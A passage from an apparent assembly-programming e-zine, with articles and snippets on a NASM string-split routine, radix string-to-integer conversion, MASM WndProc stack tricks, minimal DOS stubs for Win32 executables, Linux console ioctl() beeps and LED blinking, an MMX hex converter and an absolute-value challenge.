split() the desired number of times; however this method also requires a lot
of caller-side work --setting up an array, moving the string pointer returned
in eax to an appropriate array position, and keeping track of the number of
array elements. It is also noticeably more clumsy than the Perl version.

Another method would be to mimic the Perl function entirely, and have split()
return an array of substrings:

          push dword ptrString
          push dword [delimiter]
          call split
          mov [ptrStringArray], eax

This is obviously more elegant on the caller side, but it has a few subtle
problems: first, the control over how many elements is split is lost;
secondly, the array is of indefinite element size [i.e., one would have to
scan each string again in order to find the end and thus the next string];
and lastly, the duplication of the string in memory is somewhat of a waste.

The C language has more or less created a string standard in which strings are
terminated with a null ['\0' or 0x0] character. Most library or OS functions
to which the split strings will be passed tend to expect this termination; thus
each substring is going to have a termination byte added. However, this termin-
ation byte can replace the delimiter for each substring, thus allowing the
original string itself to serve as the array of substrings after the split
function. Thus, all that is required from the split function is to return an
array of dword pointers into the original string, and a count of the array
elements [substrings]:

          push dword ptrString
          push dword [delimiter]
          call split
          mov [ptrStringArray], eax
          mov [StringArrayNum], ebx

The split function will have to create a DWORD element for each substring
it splits; while this is somewhat wasteful, it is still less expensive than
copying the entire string a second time, unless the string is composed of
1-3 byte substrings. In order to control the number of splits, a 'max_split'
parameter will have to be added to the split() routine, such that if max_split
is NULL, the split() routine will return the maximum possible number of
substrings; if max_split is non-NULL, split() will return max_split or fewer
substrings.

The complete split routine is as follows:

#--------------------------------------------------------------------split.asm
;     split( char, string, max_split)
;      Returns address of array of pointers into original string in eax
;      Returns number of array elements in ebx
;      Behavior:
;            split( ":", "this:that:theother:null\0", NULL)
;            "this\0that\0theother\0null\0"
;            ptrArray[0] = [ptrArray+0] = "this\0"
;            ptrArray[1] = [ptrArray+4] = "that\0"
;            ptrArray[2] = [ptrArray+8] = "theother\0"
;            ptrArray[3] = [ptrArray+C] = "null\0"
EXTERN malloc
EXTERN free

split:
    push ebp
    mov ebp, esp            ;save stack pointer
    mov ecx, [ebp + 8]        ;max# of splits
    mov edi,    [ebp + 12]        ;pointer to target string
    mov ebx, [ebp + 16]        ;splitchar

    xor eax, eax                ;zero out eax for later
    mov edx, esp                ;save current stack pos.
    push dword edi                ;save ptr to first substring
    cmp ecx, 0                    ;is #splits NULL?
    jnz do_split            ;--no, start splitting
    mov ecx, 0xFFFF            ;--yes, set to MAX

do_split:
    mov bh, byte [edi]        ;get byte from target string
    cmp bl, bh                    ;equal to delimiter?
    je .splitstr            ;--yes, then split it
    cmp al, bh                    ;end of string? [al == 0x0]
    je EOS                    ;--yes, then leave split()
    inc edi                        ;next char
    loop do_split
.splitstr:
    mov [edi], byte al       ;replace split delimiter with "\0"
    inc edi                        ;move to first char after delimiter
    push edi                        ;save ptr to next substring
    loop do_split                ;loop #splits or till EOS

EOS:
    mov ecx, edx                ;edx, ecx == original stack position
    sub ecx, esp                ;get total size of pushed pointers
    push ecx                        ;save size
    call malloc                    ;allocate that much space for array
    test eax, eax
    jz .error
    pop ecx                        ;restore size
    mov edi, eax                ;set destination to beginning of array
    add edi, ecx                ;move to end of array
    shr ecx, 2                    ;divide total size/4 [= # of dwords to move]
    mov ebx, ecx                ;save count

.store:
    sub edi, 4                    ;move to beginning of dword
    pop dword [edi]                ;pop from stack to array
    loop .store

.error:
    mov esp, ebp
    pop ebp
    ret                            ;eax = array[0], ebx = array count
#------------------------------------------------------------------------EOF

The use of the stack in this routine may be a little unclear. Each time a
delimiter is encountered, the a pointer to the character after the delimiter
is pushed onto the stack:
          this:that:theother\0
          ^----------------------This is pushed at the very beginning.
                                 Element#: array[0]
          this:that:theother\0
               ^-----------------This is pushed when the first ':' is found.
                                       Element#: array[1]
          this\0that:theother\0
                     ^-----------This is pushed when the second ':' is found
                                     Element#: array[2]
          this\0that\0theother\0
                                 The stack now looks like this:
                                         --------------[ebp]
                                         ptr->string1
                                         ptr->string2
                                         ptr->string3
                                         --------------[esp]
                                         The string pointers are then POPed into the
                                         array, starting with array[2] and ending with
                                         array[0].

Once the string is parsed and the pointers are PUSHed to the stack, edi is set
to the address of the array [mov edi, eax] and advanced to the end of the
allocated array [add edi, ecx]. The counter is then set to the number of DWORD
pointers that have been pushed onto the stack [shr ecx, 2]; for each DWORD
pointer, edi is withdrawn 4 bytes more from the end of the array [sub edi, 4]
and the pointer is POPed into that 4 byte space. In the last iteration of the
loop, edi is set to the beginning of the allocated array, and the first DWORD
pointer [ array[0] ] is POPed into the first array element.

To test this, of course, one needs a program to drive it. The following code
simulates an /etc/passwd read, splitting a hard-coded line into its component,
colon-delimited fields:

#----------------------------------------------------------------splittest.asm
BITS 32
GLOBAL main
EXTERN printf
EXTERN free
EXTERN exit
%include 'split.asm'

SECTION .text
main:
    push dword szString        ;print the original string
    push dword szOutput
    call printf
    add esp, 8

    push dword ":"                ;split the original string
    push dword szString
    push dword 0
    call split
    add esp, 12

    mov ecx, ebx
    mov ebx, eax
printarray:                        ;print the substrings
    push ecx                    ;printf hoses ecx!!!!!
    push dword [ds:ebx]
    push dword szOutput
    call printf
    add esp, 8
    add ebx, 4                    ;skip to next array element
    pop ecx
    loop printarray

    push dword [ptrarray]        ;free the array created by split
    call free
    add esp, 4

    push dword 0                ;program is done
    call exit

SECTION .data
szOutput    db '%s',0Ah,0Dh,0                                    ;printf format string
szString    db    'name:password:UID:GID:group:home',0    ;string to print
#------------------------------------------------------------------------EOF

This program was written using nasm on a glibc Linux platform; however the
split routine itself is fairly portable --the only assumed external routine
is malloc() and -- and can easily be rewritten for the DOS or win32     platforms.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................FEATURE.ARTICLE
                                                   String to Numeric Conversion
                                                   by Laura Fairhead


    Here I present you with a library routine that scans a value from
a string and converts it to an integer. It is very useful, not only
when you have to convert string->value but also if you are parsing and
want to recognise a numeric token.

    The routine will scan values in any radix from 0 to 36. Characters
for the digit values from 10-35 are naturally "A"-"Z"/"a"-"z".

    With this routine there are 2 API's 'scanur' and 'scanu'. 'scanur'
is used to set the radix of the scan conversion. Once this value is
set the main routine 'scanu' can be called freely to scan values from
the string.

    The scan routine is called with a string pointer which is updated
on exit to the first invalid character. It will return with the carry
flag set if the value was too big to fit into the return register EAX.
If the carry flag is clear, there is no error, however now the zero flag
indicates if a valid value was actually scanned. This return status
convention gives the most flexibility to the application programmer,
also if a valid value MUST be scanned they can detect the condition
via:-

    CALL NEAR PTR scanu
    JNA error                ;get out if overflow/no value

    The branch will be taken if CF=1 or ZF=1. Hence, if a value has to be
scanned errors may be picked up with only one test.


=========START OF CODE=====================================================
;
;(current scan radix)
;
scanuradi:
        DB ?

;
;scanur-    set up for scanu routine
;
;entry:        AL=radix
;
;         !! radix must be in range 0<=radix<=36
;
;         !! radix must be set by calling this routine prior to
;         !! using scanu
;
;exit:        (all registers preserved)
;

scanur    PROC NEAR

        MOV BYTE PTR CS:[scanuradi],AL
        RET

scanur    ENDP

;
;scanu-        scan string value returning result
;
;entry:        DS:SI=address of string
;            DF=0
;
;         !! radix must be set previously by calling 'scanur'
;
;exit:        SI=updated to offset of first invalid character
;
;            CF=1
;             a numeric overflow has occurred, ie: the number being scanned
;            has become too big to fit into EAX
;
;            CF=0
;             if ZF=0 then a valid value was scanned, if ZF=1 then no
;            valid digits were scanned
;
;            EAX=converted value
;

scanu    PROC NEAR
;
;preserve registers
;
        PUSH EDX
        PUSH EBX
        PUSH ECX
        PUSH DI
;
;initialise
;  EBX=radix constant
;  EAX=total
;  ECX=0, bits8-24 of ECX always=0 to pad byte digit to dword
;    DI=holds original offset
;
        XOR EAX,EAX
        XOR EBX,EBX
        XOR ECX,ECX
        MOV DI,SI
        MOV BL,BYTE PTR CS:[scanuradi]
;
;main loop start
; EAX,ECX change roles so that we can use AL for the digit calculation
; saving code length
;
lop:    XCHG EAX,ECX
        LODSB
;
;if "0"-"9" map to 0-9 and skip to radix check
;
        SUB AL,030h
        CMP AL,0Ah
        JC SHORT ko
        ADD AL,030h
;
;map "A"-"Z"-/"a"-"z"- to 10-35- aborting on the one invalid value (040h)
;that won't get trapped in the next stage
;
        AND AL,0DFh
        SUB AL,037h
        CMP AL,0Ah
        JC SHORT ko2
;
;digit value checked that it is valid for the current radix
;this also weeds out previous invalid values (since they would be >35)
;jump out of loop is delayed so that EAX can be restored for exit
;
ko:        CMP AL,BL
        CMC
ko2:    XCHG EAX,ECX
        JC SHORT erriv
;
;accumalate the digit to the total. the total must be pre-multiplied.
;checks for overflow are done at both points so the routine can never
;generate false results
;
        MUL EBX
        JC errovr
        ADD EAX,ECX
        JNC lop
;
;overflow error
;    adjust SI index to current char and exit, note
;    that CF =1 already
;
errovr: DEC SI
        JMP SHORT don
;
;invalid character
;    main exit point, SI is adjusted to the current char
;    the CMP ensures that CF =0, and also that ZF =1 iff
;    no chars have been read
;
erriv:    DEC SI
        CMP SI,DI
;
;(restore registers and exit)
;
don:    POP DI
        POP ECX
        POP EBX
        POP EDX
        RET

scanu    ENDP

=========END OF CODE=======================================================


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                        WndProc, The Dirty Way
                                                        by X-Calibre of Diamond


I assume you all know what a WndProc is, and what you need it for. Let me
give you a quick example of a WndProc:

    WndProc      PROC hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
        .IF uMsg == WM_DESTROY
            INVOKE PostQuitMessage, NULL
        .ELSE
            INVOKE DefWindowProc, hWnd, uMsg, wParam, lParam
            ret
        .ENDIF
            xor      eax, eax
            ret
    WndProc      ENDP

This generates the following code:

    push  ebp                                    ; Create stack frame
    mov      ebp, esp                                ; Why does MASM use 'leave',
                                                ; but not 'enter'?

    cmp      dword ptr [ebp+0C], WM_DESTROY        ; ebp+0C is uMsg
    jne      @@notDestroy

    push  NULL
    Call  PostQuitMessage
    jmp      @@exitFromDestroy

    @@notDestroy:
    push  [ebp+14]                                ; ebp+14 is lParam
    push  [ebp+10]                                ; epb+10 is wParam
    push  [ebp+0C]                                ; ebp+0C is uMsg
    push  [ebp+08]                                ; ebp+08 is hWnd
    Call  DefWindowProcA                        ; Let Windows handle the other
                                                ; messages

    leave                                        ; Remove stack frame
    ret      0010                                    ; Remove function arguments
                                                ; from stack and return

    @@exitFromDestroy:
    xor      eax, eax                                ; Return 'FALSE'
    leave                                        ; Remove stack frame
    ret      0010                                    ; Remove function arguments
                                                ; from stack and return

Looks nice, and works fine... But, it builds a stack frame, even though we are
not using local variables. And if you code in a good fashion, there almost
never will be ...after all, this procedure is just a messagehandler, and to keep
your code tidy, you will not put all the code in here, but in separate procedures,
which you will call from here.

There's only one reason why MASM builds a stack frame for a function: The
function has a prototype for a hll call. A hll call uses the stack to transfer
its arguments.

So, all we have to do, is remove the prototype. That's easy: Just don't tell
MASM that this function uses any arguments.
This simple tweak will do the trick:

    WndProc      PROC
        ...
    WndProc      ENDP

The arguments will still be passed to the function, since that part of the
code is in the Windows kernel, and has not changed. Be careful though: Since
MASM does not know that there are arguments on the stack, it no longer cleans
up the stack. You have to specify that yourself.

Now we have a slight problem: How can we access the arguments now?
The answer is surprisingly easy: We create aliases for the addresses relative
to the stack pointer (esp). MASM does the same, except that it uses the base
pointer since it created a stack frame, and saved the original stack pointer
in ebp.
Knowing that Windows hll calls always push the arguments in reverse order, and
that the return address is stored on the stack aswell, we can devise these
indices for our parameters:

    hWnd    EQU       dword ptr [esp][4]
    uMsg    EQU       dword ptr [esp][8]
    wParam    EQU       dword ptr [esp][12]
    lParam    EQU       dword ptr [esp][16]

There, now we can refer to the arguments as usual.
There's 1 drawback however: Since the indices are relative to esp, they are
only valid when esp is not touched. In other words: Don't try to push or pop
anything and then use these arguments again. They can be used if you push some
variables, then pop them again before you access any of these arguments again,
because the stack pointer will be at the correct position again.

Let's say you need to use the stack again (eg. for an INVOKE), so the indices
will be invalidated. You might think that the only option then is to save the
stack pointer again, so we're back to the stack frame...
It's an option, but not the best one. Namely, ebp is a non-volatile register,
and needs to be saved and restored after use.
But, there are more registers in the CPU, and most of them are volatile. How
about using esi for example?

    WndProc      PROC
        mov      esi, esp
        hWnd    EQU       dword ptr [esi][4]
        uMsg    EQU       dword ptr [esi][8]
        wParam    EQU       dword ptr [esi][12]
        lParam    EQU       dword ptr [esi][16]

        ...
    WndProc      ENDP

And if you leave the stack as you found it (which should always be the case
with decent code), you don't even need to restore esp again.
If you got dirty and the stack still contains variables you don't want
anymore, then this is enough for a clean exit:

    WndProc      PROC
        ...
        mov      esp, esi
        ret      4 * sizeof dword        ; As I mentioned earlier, we have to clean
                                    ; the stack ourselves.
                                    ; We had 4 dword arguments, so this does
                                    ; the trick
    WndProc      ENDP

Still less code, and thus faster than the original. And just as rigid. You
have one register less to use during the WndProc, but as I said earlier, there
shouldn't be too much code here, so should be able to spare the register.

Well, there's just 1 more thing that can be done with this tweaked WndProc.
Namely, if you leave the stack as you found it, the arguments for the
DefWindowProc are already in place, and the return address of our caller is
there too.
So basically we can just jump to it without any further ado. The resulting
WndProc that is equivalent to the original one will look like this then:

    WndProc      PROC
        hWnd    EQU       dword ptr [esp][4]
        uMsg    EQU       dword ptr [esp][8]
        wParam    EQU       dword ptr [esp][12]
        lParam    EQU       dword ptr [esp][16]

        .IF uMsg == WM_DESTROY
            INVOKE PostQuitMessage, NULL
        .ELSE
            jmp     DefWindowProc
        .ENDIF

        xor      eax, eax
        ret      4 * sizeof dword        ; Be sure to clean that stack!
    WndProc      ENDP

Yes, much shorter, and faster. Let's take a look at the generated code to get
a better understanding of how much shorter it actually is:

    cmp      dword ptr [esp+08], WM_DESTROY
    jne      @@noDestroy

    push  NULL
    Call  PostQuitMessage
    jmp      @@exitFromDestroy

    @@noDestroy:
    Jmp      DefWindowProcA

    @@exitFromDestroy
    xor      eax, eax
    ret      0010

If you code it 'by hand' instead of with the .IF statement, there's another
tweak we can pull, but the rest looks great, doesn't it?

Of course these stunts can be applied to other procedures as well. Be careful,
and use them in good health.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................WIN32.ASSEMBLY.PROGRAMMING
                                                       Programming the DOS Stub
                                                       by X-Calibre of Diamond


As you may (or may not) know, there is a piece of DOS code still in every
Win32 executable file. This piece of code is referred to as the 'stub' and
ensures that the Win32 program won't cause a crash when run on a DOS system.
It just prints the familiar 'This program can not be run in DOS' message and
exits.

'So what do we care?' you might ask... Well, Microsoft's linker provides the
option to link your own stub instead of the standard one. And, you must have
guessed it already by now: We can do it better than Microsoft!

So, how do we do this then?

Well, actually it's very simple: The first part of the Win32 executable is
literally a DOS file. There's just one small requirement: at offset 3Ch (60)
there is a DWORD specifying the start of the PE block relative to the start of
the file (the offset).

So basically you can just put any DOS EXE program in there, as long as you
make sure that there is room for the DWORD at offset 3Ch in the file. Usually
this is no problem, since the EXE header itself is usually quite big, and a
lot of the space is not being used. Microsoft's own stub has an empty header
mostly, and the code starts right after the DWORD, at offset 40h.

That's all fine and nice and whatever, but what can we do with this info?
Well, you could link in an entire DOS program for people not using Windows
(Look at REGEDIT.EXE in Windows 9x for an example). You could include a Fire
or Plasma effect when your program is run in DOS. You could create your own
'This program can not be run in DOS mode' message. But, most importantly:
you can create smaller EXE files! One of the nicer applications of this stub,
which I'm going to explain a bit here.

What is the smallest size for the stub, theoretically speaking?

Well, considering the fact that at offset 60 there MUST be an offset pointing
to the PE header, the minimum size will be 60 bytes.
The actual stub file has to be 64 bytes, because of restrictions of Microsoft's
linker. But be sure not to use the last 4 bytes, since the linker will put in
the offset there.

Well, so in 60 bytes, you can't really do much. But just printing a small
warning for DOS users and then exiting is just about possible. Microsoft made
their version a little large: 120 bytes. So we can try to do just about the
same in 60 bytes.

We're going to use a little trick here, to get the program as small as 60
bytes. At offset 20h, there is room for a relocation table for the code. But
since we won't be needing them, we're going to put our code in there. This
is perfectly possible, because you can specify how many relocation table items
your program will be using. We just put in a 0 word at offset 6 in the header,
and the table is ours. Technically speaking, the code is still after the table.
The table just has a length of 0 bytes.

For all you non-DOS coders out there, this is what the program looks like:

;====================================================================stub.asm
.Model Tiny

.code
start:
    push cs         ; Point the data segment to the code segment, since
    pop     ds         ; we're putting the data after the code to save space.

    mov     dx, offset message ; Load pointer to the string for the call.
    mov     ah, 9                ; 9 is the print argument for int 21h.
    int     21h                ; The DOS interrupt.

    mov     ah, 4Ch            ; 4C is the exit argument for int 21h
    int     21h

; Put our string here
message db        "Windows prg!",0Dh,0Ah,'$'

; A little explanation may be required:
;
; 0Dh is the 'Carriage return' ASCII code.
; 0Ah is the 'Line feed' ASCII code.
; '$' is the string-terminator in DOS (like 0 is in Windows and other C based
; OSes)
end start
;=========================================================================EOF

The message can be 15 bytes at most, including the string terminator, since
the program itself starts at offset 32 in the file, and is 12 bytes long.
(32+12+15 = offset 59 bytes, so the next byte will be used for the PE offset
DWORD).

This version yields an undefined error code on exit. The error code is
specified in al when you call the exit DOS function. The errorcode actually
depends on the output in al of the int 21h call that prints the string. This
is ofcourse undefined (actually it is 24h in Windows 98).

Microsoft's stub has a defined errorcode of 1. If you want to make your stub
100% the same, then you must replace the 'mov ah, 4Ch' with 'mov ax, 4C01h'.
Mind you, that this code is 1 byte longer, so your message can then be only 14
bytes long in total.

Since I'm never going to use the errorcode, I decided to save the byte and use
a larger string.

And that's that. Now you may run into trouble with the linker. I couldn't find
a linker that kept the EXE header to its minimum (which is 32 bytes). I used
TLINK, which made a 512 byte header. So I just edited the file manually, and
got it to its minimum size. A document explaining the EXE header format is
enclosed, and so is the STUB.EXE I made, and a small Win32 application using
it (with relocated PE header at 40h).
I will just briefly describe how the filesize is stored in the header, since
the document is not particularly clear there.

offset    length    description                                comments
----------------------------------------------------------------------
2        word    length of last used sector in file        modulo 512
4        word    size of file, incl. header                in 512-pages

The '512-pages' at offset 4 are (floppy) disk sectors. They are 512 bytes
each. So to calculate how many sectors your file will occupy, this formula
will suffice:

    sectors = CEILING(filesize/512)

CEILING means to round off to nearest natural number above the fraction.

The length of the last used sector at offset 2 stores how many bytes are
occupied in the last sector of the file. Like the comment says, it's filesize
modulo 512.
In other words:

    lastusedsector = filesize - FLOOR(filesize/512)

The other way around is ofcourse like this:

    filesize = (sectors - 1)*512 + lastusedsector

A little note here: Look at these 2 values in a program with the standard
Microsoft stub (eg. NOTEPAD.EXE).
We find these 2 values:

offset 2: 0090h
offset 4: 0003h

So the filesize is: (3 - 1)*512 + 144 = 1168

Now wait just a second! At offset 3Ch we find 00000080h...
So at offset 128 we find the PE header and the Windows program. Then how can
the DOS stub be 1168 bytes?

It can't!! Microsoft goofed up here... They have probably hand-edited the
EXE file they used for the stub like I did, and forgot to edit these values.
Luckily for them, this bug does no harm. But still...

Well, after we have created our DOS stub, all we have to do is link it in.
With Microsoft's linker it goes like this:

LINK code.obj /SUBSYSTEM:WINDOWS /STUB:STUB.EXE

And that's all you need!
You can ignore the warning the linker gives about the incomplete header. We
know that the program runs. The linker just doesn't consider EXE headers with
no relocation table (which could actually be considered a bug, since our EXE
header specifies that the table has length 0, and therefore the code can start
at offset 20h. The DOS EXE loader does interpret it correctly, so in fact, the
linker could be considered incompatible).

The only problem with Microsoft's linker is that it doesn't seem to want to
link the PE block right after the DOS stub. Maybe other linkers do, but I
haven't found one that does yet. Microsoft's linker just dumps some garbage,
and then puts its PE block at offset 78h. Maybe that is because their stub is
78h bytes long and they don't consider shorter stubs?
The offset at which the PE block is linked depends on the initial SP value
specified at offset 10h, actually (why is that?). It can also link at offset
80h or 88h.
You could move the PE block to offset 40h, and pad with 0's after the PE block,
using a hex-editor. This way it will compress even better, maybe. And you
could perhaps edit the PE block and move the code forward a bit too (there's a
great util in this. Shall we make it?).

Well, anyway... Have fun, and get crazy with your custom DOS stubs!

And remember:

DOS Knowledge is power!


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::............................................THE.UNIX.WORLD
                                                                  Using ioctl()
                                                                  by mammon_


One of the most famous Unix maxims reads 'everything is a file'; directories
are files, pipes are files, hardware devices are files, even files are files.
This provided a transparent means or reading and writing hardware or software
constructs such as modems and sockets; yet the lack of interrupts or device
driver routines is sometimes confusing for those not used to Unix programming.
In linux, handling device parameters through the character and block 'special
file' interface is handled through ioctl().

The ioctl() system call takes a file descriptor and a request type as its
primary arguments, along with an optional third argument referred to as "argp"
which contains any arguments that must be passed along with the request. The
possible ioctl() requests can be found by poking around in the $INCLUDE/asm and
$INCLUDE/linux header files, although a somewhat dated list of requests can be
viewed by typing 'man ioctl_list'.

One of the most useful devices to program with ioctl() for the applications
programmer will be the console; in linux terms, this consists of the keyboard
and display, such that all 63 of the Virtual Consoles can be controlled with
ioctl(). This can be useful if one wants to output debugging information to a
non-visible console, or to transfer STDIN and STDOUT to a newly-allocated
console while disabling virtual console switching, effectively tying the user
to a single console [e.g., in a walkup workstation].

Information on console ioctl requests can be found with 'man console_ioctl'.
Bringing up this man page instantly displays the following text:
       WARNING: If you use    the     following    information     you  are
       going to burn yourself.

       WARNING:     ioctl's are undocumented Linux internals, liable
       to be changed without warning.  Use POSIX functions.
This is ancient asm coderspeak meaning 'you are on the right track, keep going.'

Perusing the listed requests will provide enough information to code that first
exercise from DOS-ASM 1o1: generating a tone on the PC speaker.
       KDMKTONE
       Generate     tone  of  specified length.  The lower 16
       bits of argp specify the period    in    clock  cycles,
       and    the     upper    16 bits give the duration in msec.
       If the duration is zero, the sound is  turned  off.
       Control    returns     immediately.  For example, argp =
       (125<<16) + 0x637 would specify the    beep  normally
       associated  with     a    ctrl-G.      (Thus since 0.99pl1;
       broken in 2.1.49-50.)

This should not be too terribly hard to implement -- a call to open the file
descriptor, and a single call to ioctl() to sound the tone. First things first,
open() is called on /dev/tty to create a handle for the current console:
#-------------------------------------------------------------------beep.asm
%define O_RDWR 2                    ;grep O_RDWR /usr/include/asm/*
%define KDMKTONE 0x4B30            ;grep KDMKTONE /usr/include/linux/*
EXTERN open
GLOBAL main

section .data
szTTY db '/dev/tty',0

section .text
main:
          push dword O_RDWR
          push dword szTTY
          call open
          add esp, 8
#--------------------------------------------------------------------BREAK

Next, calculate the frequency and duration of the tone to be played:
#---------------------------------------------------------------------CONT
          mov dx, 666            ;duration
          shl edx, 16
          or dx, 1199            ;tone
#--------------------------------------------------------------------BREAK

Now, normally one might call ioctl as so:
          push edx
          push dword KDMKTONE
          push eax
          call ioctl
          add esp, 12

However, ioctl is a systemcall, and we can save a bit of time by going
straight through the syscall gate at 0x80:
#---------------------------------------------------------------------CONT
          mov ebx, eax
          mov ecx, KDMKTONE
          mov eax, 54                ;ioctl func defined in /usr/include/asm/unistd.h
          int 0x80
          ret
#----------------------------------------------------------------------EOF

So much for the simple beep. Another ASM 101 favorite is the 'blinking LED'
trick, where students learn to make the keyboard LEDs blink on and off in any
number of psychedelic patterns. A quick tour through the man page shows the
requests needed for this sample as well:

       KDGETLED
       Get state of LEDs.  argp points to a long int.  The
       lower  three     bits of *argp are set to the state of
       the LEDs, as follows:
           LED_CAP         0x04    caps lock led
           LED_NUM         0x02    num lock led
           LED_SCR         0x01    scroll lock led
       KDSETLED
       Set the LEDs.  The LEDs are set    to    correspond    to
       the lower three bits of argp.  However, if a higher
       order bit is set, the LEDs revert to     normal:  dis-
       playing the state of the keyboard functions of caps
       lock, num lock, and scroll lock.

The file descriptor must be opened as with the previous example. From there,
we must get the current LED state:
#--------------------------------------------------------------------led.asm

%define KDGETLED        0x4B31           ;grep KDGETLED /usr/include/linux/*
%define KDSETLED        0x4B32           ;grep KDSETLED /usr/include/linux/*

          xor edx, edx
          mov ecx, KDGETLED
          mov ebx, eax
          mov eax, 54
          int 0x80
#--------------------------------------------------------------------BREAK

Next, all of the LEDs will be turned on and then off 10 times. It is vital
to the success of the algorithm that a delay be present between the off and
on transitions; otherwise the LEDs will appear to be steadily lit, and that
is much less of a programming achievement:
#---------------------------------------------------------------------CONT
          mov ecx, 10
.here:
          push ecx                    ;save counter
          or edx, 0x07                ;set all of 'em
          mov ecx, KDSETLED
          mov eax, 54
          int 0x80

          mov ecx, 0xFFFFFF            ;delay counter
.delay:
          loop .delay

          and edx, 0                ;turn all of them off
          mov ecx, KDSETLED
          mov eax, 54
          int 0x80

          mov ecx, 0xFFFFFF            ;next delay counter
.delay2:
          loop .delay2

          pop ecx
          loop .here

          ret
#----------------------------------------------------------------------EOF
Blinking the LEDs in succession and achieving hypnotic frequency via ioctl()
will be left as an exercise to the reader.

This should provide a quick introduction to using ioctl(). There are many more
possibilities available for scan codes, screen painting, and virtual console
control; further opportunities for console amusement exist also within the realm
of escape-sequence programming. The examples presented here can be compiled with
the standard
    nasm -f elf file.asm
     gcc -o file file.o
combination, or by using a Makefile:
#----------------------------------------------------------------------Makefile
TARGET =beep                 #TARGET is the variable storing the base filename

ASM = nasm                     #ASM contains the name of the assembler
ASMFILE = $(TARGET).asm         #ASMFILE contains the full name of the source file
OBJFILE = $(TARGET).o         #OBJFILE contains the full name of the object file
LINKER = gcc                 #LINKER contains the full name of the linker
LIBS =                         #LIBS contains any library flags
LIBDIR =                     #LIBDIR contains any library location flags

all:                         #the 'all:' section applies to all targets
    $(ASM) -o $(OBJFILE) -f elf $(ASMFILE)
    $(LINKER) -o $(TARGET) $(OBJFILE) $(LIBDIR) $(LIBS)
#---------------------------------------------------------------------------EOF
As with all Makefiles, with the target correctly set the source will be compiled
and linked simply by typing 'make' in the directory where the Makefile is
located.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                           BinToString
                                                           by Cecchinel Stephan


;Summary:        Converts a 32 bit number to an 8-byte string.
;Compatibility: MMX+
;Notes:             14 cycles. Input is stored in EAX; the output is a hex-
;                format character string pointed to by [EDI].
Sum1:      dd    0x30303030, 0x30303030
Mask1:      dd    0x0f0f0f0f, 0x0f0f0f0f
Comp1:      dd    0x09090909, 0x09090909
Hex32:
        bswap    eax
        movq    mm3,[Sum1]
        movq    mm4,[Comp1]
        movq    mm2,[Mask1]
        movq    mm5,mm3
        psubb    mm5,mm4
        movd    mm0,eax
        movq    mm1,mm0
        psrlq    mm0,4
        pand    mm0,mm2
        pand    mm1,mm2
        punpcklbw mm0,mm1
        movq    mm1,mm0
        pcmpgtb mm0,mm4
        pand    mm0,mm5
        paddb    mm1,mm3
        paddb    mm1,mm0
        movq    [edi],mm1
        ret


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE
                                                              Absolute Value
                                                              by Laura Fairhead


The Challenge
-------------
Find the absolute value of a register in only 4 bytes.

The Solution
------------

        NEG AX
        JL SHORT $-2

This was not completely my original idea (is there such thing??); I
found a similar sequence which used the more obvious branch 'JS'. The
JS had the problem that it goes into an infinite loop if AX=08000h.


::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::.......................................................FIN